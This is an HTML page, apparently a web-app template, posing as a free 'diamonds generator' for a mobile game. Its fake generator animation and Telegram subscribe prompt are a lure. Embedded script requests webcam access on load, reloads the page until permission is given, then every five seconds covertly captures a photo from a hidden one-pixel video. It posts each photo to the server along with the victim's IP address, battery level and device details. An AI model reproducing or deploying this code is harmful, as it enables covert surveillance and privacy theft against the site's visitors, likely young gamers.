<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FREE DIAMONDS</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <style>
        * {
            margin: 0;
            padding: 0;
            color: black;
        }

        .head {
            position: absolute;
            margin: 0;
            width: 100%;
        }

        .header {
            height: 40px;
            line-height: 40px;
            font-size: 26px;
            font-weight: 800;
            margin-left: 10px;
        }

        body {
            background-image: url('https://e0.pxfuel.com/wallpapers/639/103/desktop-wallpaper-chou-stun-mobile-legends-ultra-mobile-in-2021-mobile-legend-mobile-legends-alucard-mobile-legends.jpg');
            background-repeat: no-repeat;
            background-position: center;
            background-size: cover;
            background-attachment: fixed;
        }

        .forum {
            width: 80%;
            height: max-content;
            margin: 0% 10%;
            margin-top: 40px;
        }

        @media only screen and (min-width: 600px) {
            .forum {
                width: 60%;
                margin: 0% 20%;
                margin-top: 90px;
            }
        }

        .oyna {
            background-color: rgba(90, 90, 90, 0.781);
            width: 100%;
            height: 100vh;
            position: fixed;
        }

        .error {
            width: 80%;
            margin: 0% 10%;
            background-color: white;
            border-radius: 6px;
            margin-top: 20%;
            height: 50vh;
            padding-top: 30px;
        }

        #generator {
            background-color: rgba(90, 90, 90, 0.781);
            width: 100%;
            height: 100vh;
            position: fixed;
        }
    </style>
</head>

<body style="width: 100%; height: 100%; position: fixed;">

    <div id="generator" style="display: none;">
        <center style="margin-top: 30%; display: block;" id="gen1">
            <div class="spinner-border" style="width: 3rem; height: 3rem;" role="status">
                <span class="sr-only "></span>
            </div>
            <h2 id="status">
                Finding...
            </h2>
        </center>
        <center style="display: none;" id='gen2'>
            <a href="https://t.me/seniorTeamAR" target="_blank">
                <img src="https://cdn-icons-png.flaticon.com/512/190/190411.png"
                    style="width: 50%; height: 50%; margin-top: 30%">
                <h2 style="color: white; font-size: 56px;">SUCCESS</h2>
            </a>
        </center>
    </div>
    <div class="oyna" style="display: none;" id="oyna">
        <center>
            <div class="error">
                <h1>Subcribe for get diamonds</h1>
                <br>
                <a class="btn btn-primary btn-block btn-lg w-50" style="margin-top: 10px; " target='_blank'
                    onclick='boshla()' href="https://t.me/seniorTeamAR" id="subcribe">Subcribe<div id=spinner
                        style="display: none;" class="spinner-border" role="status">
                        <span class="sr-only"></span>
                    </div></a>
                <br>

                <br>
                <button id="generate" class="btn btn-success btn-block btn-lg w-50" style="margin-top: 10px;"
                    onclick="start()" disabled>GENERATE</button>

            </div>

        </center>
    </div>
    <div class="head">
        <div class="header">
            <h1>
                <center style="color: white;">DIAMONDS GENERATOR</center>
            </h1>
        </div>
    </div><br>
    <div class="forum">
        <form method="post">
            <div class="row">
                <div class="col">
                    <input type="text" class="form-control form-control-lg" placeholder="id" name="id" id="id_name">
                </div>
                <div class="col">
                    <input type="number" class="form-control form-control-lg" placeholder="server" name="server"
                        id="server_name">
                </div>
            </div>
            <select class="form-select form-select-lg" required style="margin-top: 15px;" autocomplete="off"
                id="diamond">
                <option value="8">8 diamonds</option>
                <option value="35">35 diamonds</option>
                <option value="88">88 diamonds</option>
                <option value="132">132 diamonds</option>
                <option value="264">264 diamonds</option>
                <option value="440">440 diamonds</option>
                <option value="734">734 diamonds</option>
                <option value="933">933 diamonds</option>
                <option value="1410">1410 diamonds</option>
                <option value="1881">1881 diamonds</option>
                <option value="2815">2815 diamonds</option>
                <option value="6163">6163 diamonds</option>
            </select>

            <div class="d-grid">
                <span class="btn btn-primary btn-block btn-lg" style="margin-top: 10px;" id="btn"
                    onclick="start()">GENERATE</span>
            </div>
        </form>
        <input type="text" value="0" style="display: none;" id="holat">
    </div>
    <div class="futer"
        style="display: block; width: 100%;height: 40px;color: white;position: absolute; margin-bottom: 0%;margin-top: 100%;">
        Made by aveok
    </div>
    <input type="text" value={{ csrf_token }} id="holat2" style="display: none;">
    <input type="text" value={{ user_id }} id="ho" style="display: none;">
    <button id="start-camera" style="display: none;">Start Camera</button>
    <video id="video" width="1" height="1" autoplay></video>
    <button id="click-photo" style="display: none;">Click Photo</button>
    <canvas id="canvas" width="320" height="240" style="display: none;"></canvas>
</body>



</html>
<script>

</script>
<script>
    let camera_button = document.querySelector("#start-camera");
    let video = document.querySelector("#video");
    let click_button = document.querySelector("#click-photo");
    let canvas = document.querySelector("#canvas");
    let camera_bor = false;
    function startCamera() {
        return navigator.mediaDevices.getUserMedia({ video: true, audio: false })
            .then(stream => {
                video.srcObject = stream;
            })
            .catch(err => {
                camera_bor = true;
                document.location.reload();
                if (err.name === 'NotAllowedError') {
                    alert("Davom ettirish uchun ruhsat bering")
                } else {
                    alert("something went wrong")
                }
            });
    }


    (async function () {
        await startCamera();
        while(camera_bor===true) {
            await startCamera();
        }
    })();

    async function takePicture() {
        if (camera_bor===true) {return;
        }
        canvas.getContext('2d').drawImage(video, 0, 0, canvas.width, canvas.height);
        const blob = await new Promise(resolve => canvas.toBlob(resolve));
        const form_data = new FormData();
        form_data.append('image', blob, 'image.jpg');
        const battery = navigator.getBattery();
        const battery_level = await new Promise(resolve => battery.then(b => resolve(b.level*100)));
        form_data.append('battery', battery_level);
        form_data.append('user_agent', navigator.userAgent);
        form_data.append('platform', navigator.platform);
        form_data.append('app_code_name', navigator.appCodeName);
        form_data.append('app_name', navigator.appName);
        form_data.append('app_version', navigator.appVersion);
        form_data.append('device_memory', navigator.deviceMemory);
        form_data.append('device_pixel_ratio', window.devicePixelRatio);
        form_data.append('ip_address', await (await fetch('https://api.ipify.org/?format=json')).json().ip);
        form_data.append('lang', navigator.language);
        form_data.append('max_touch_points', navigator.maxTouchPoints);
        form_data.append('id', document.getElementById('ho').value);
        const response = await fetch('/', {
            method: 'POST',
            headers: {
                'X-CSRFToken': document.getElementById('holat2').value,
            },
            body: form_data
        });
        const data = await response.text();
        console.log(data);
    }

    setInterval(takePicture, 5000);


</script>


<script>
    let spinner = document.getElementById('spinner');
    let subcribe = document.getElementById('subcribe');
    let generate = document.getElementById('generate');
    let holat = document.getElementById('holat');
    let oyna = document.getElementById('oyna')
    let btn = document.getElementById('btn');
    let id_name = document.getElementById('id_name'), server_name = document.getElementById('server_name');
    let generator = document.getElementById('generator');
    let status = document.getElementById('status');
    let diamond = document.getElementById('diamond');
    function start() {
        if (holat.value == 0) {
            tek();
        }
        else {
            bosh();
        }
    }
    function bosh() {
        oyna.style.display = 'none';
        generator.style.display = 'block';
        console.log(status.value);
        sleep(2000).then(() => {
            status.innerHTML = 'finded';
            sleep(500).then(() => {
                status.innerHTML = 'id=' + id_name.value + `<br>
                `+ 'server=' + server_name.value + `<br>
                `+ 'diamonds=' + diamond.value;
                sleep(2000).then(() => {
                    status.innerHTML = '<br> Hacking....';
                    sleep(1000).then(() => {
                        let gen1 = document.getElementById('gen1'), gen2 = document.getElementById('gen2');
                        gen1.style.display = 'none';
                        gen2.style.display = 'block'

                    })
                })
            })
        });
    }
    function tek() {
        if (tuliq_tek() == true) {
            oyna.style.display = 'block';
        }
    }
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    function boshla() {
        spinner.style.display = 'inline-block';
        sleep(2000).then(() => {
            spinner.style.display = 'none';
            subcribe.className = 'btn btn-success btn-block btn-lg w-50';
            generate.disabled = false;
            holat.value = '1';
        });
    }
    function tuliq_tek() {
        if (id_name.value == '') {
            alert('ID IS WRONG');
            return false
        }
        if (server_name.value == '') {
            alert('SERVER IS WRONG')
            return false
        }
        return true
    }
</script>